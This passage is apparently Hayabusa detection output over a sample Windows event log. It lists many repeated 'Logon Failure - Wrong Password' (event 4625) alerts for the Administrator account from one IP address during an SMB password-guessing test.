NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.735 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HnJyN8wF21ff2L1e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.769 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MUZHZJMQznj6GBqg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.804 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: P9h52ZKMbXLuFvUV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.839 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n95RJvcQnFrAG2iX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.883 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xI23nmysFlr1pvVf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.916 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nVsjcTxDdZbzkmMx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.955 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mMuWatQuNBh9UKdR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.992 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BfC3JZ3awqFDNQbm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:09.028 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 337h8PHN6Axi0iaY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:09.071 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qGQpWOuzgETfxTgJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:09.108 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oFjlyMAJMI2zIC8w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:09.144 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7exAVz3PlzJQ6Wcw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:09.183 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RuYihjQpt76foAW3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:09.219 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OlPm2vRh9EHN9J6n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:09.255 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n9jDy3NDDPe7XgyW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:09.291 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AtGxqEKOoP6W3w0Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:09.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BLqYztXwV80UBez1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:09.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C0yki1dEFZrnMLs2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:09.420 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jbE2z1W1wQgoTDso | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:09.455 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IJmZFXFxiLuWWkMC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:09.500 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x9EPwprgXSJNUFfg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:09.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h0ZjYxZ8K5m5F1vo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:09.587 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xSw7OjDv8ldqbm5T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:09.631 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mk0BAdOI210HwPhX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:09.686 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wSwWz57Kvl2XJVUR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:09.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DLcfSrHT5bSsNnuQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:09.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rQDkbESps0PXWEUT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:09.797 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZpnyzkXasuyAtdn1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:09.840 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ps9IqJzTliJvzpIS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:09.876 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V7PLb2uRTIY8t123 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:09.921 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sHAJ9p0QbSRxhvtk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:09.968 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YRiE1wGrwWAx0feP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:10.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Flo4bCVjmlaHz0QS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:10.061 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HscUujSzd3Ua7dqg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:10.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aIQPTx67aEer51wb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:10.191 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MqUoXUf7PKIaoDjs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:10.222 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wzeB4DAS1W633tmh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:10.263 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UTtXTrqHoCZMbDLT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:10.311 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4HVv5PgPhiDW3qcj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:10.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g21VoO45UrIbTuZO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:10.383 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rGpD7AJUTekDmd6Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:10.423 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OykzTOn7B9THv0cT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:10.462 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cIYOrBBwX8nFpCzw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:10.508 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SvnROHLMVnmPfAyy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:10.547 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5EwJ84H7kXQXzGZz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:10.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 34RLeLWDgLayU3JM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:10.619 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QaXHGUgboODAi5Qu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:10.659 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QlOlZ0m397CsmaeD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:10.699 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N24rSPCI8DsQIPXR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:10.738 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5y2tgoUcs6mFPZm4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:10.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HmFX6MioYqaMumgw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:10.820 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R4HRWlPWPKy1Cicq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:10.869 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GDUf7wVbHkS9uaPC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:10.917 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eBX0Lviz6Bv5rGcb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:10.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zZwPm9qahLU78FRY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:11.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jOVsopykTHNQcYUp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:11.060 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n8DY7sdDY8nuWdME | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:11.105 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rTxEVu7mudXEBARZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:11.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7ohqvCoOLkFRcqvE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:11.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: me8rikVJqcKxvHdq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:11.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oLqVmqCmHTrD7V8V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:11.269 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5ySdyzxvDasHgjq0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:11.312 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N2auwOc1wemq76n1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:11.348 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RgK6lHgC5WOBk4kW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:11.389 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2GG0bKgusKqseQij | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:11.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MpHm7DcOmhq4rkaX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:11.468 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OX1vVGrE7fJSMEiZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:11.508 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 65i7wtyAhL58QrzC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:11.551 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k8uSVFRTLTB6g1eg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:11.592 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ire6VOUMWZQnNjES | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:11.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pGWnvKUXnbJvRqql | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:11.666 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xBVvrrLf1rnAviKS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:11.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NE9atGNBlSLQLLcX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:11.744 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a0M5EaAXziu07hOH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:11.784 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PM1mwxqI7yVgoK2D | IP Addr: 192.168.198.149 | AuthPackage: 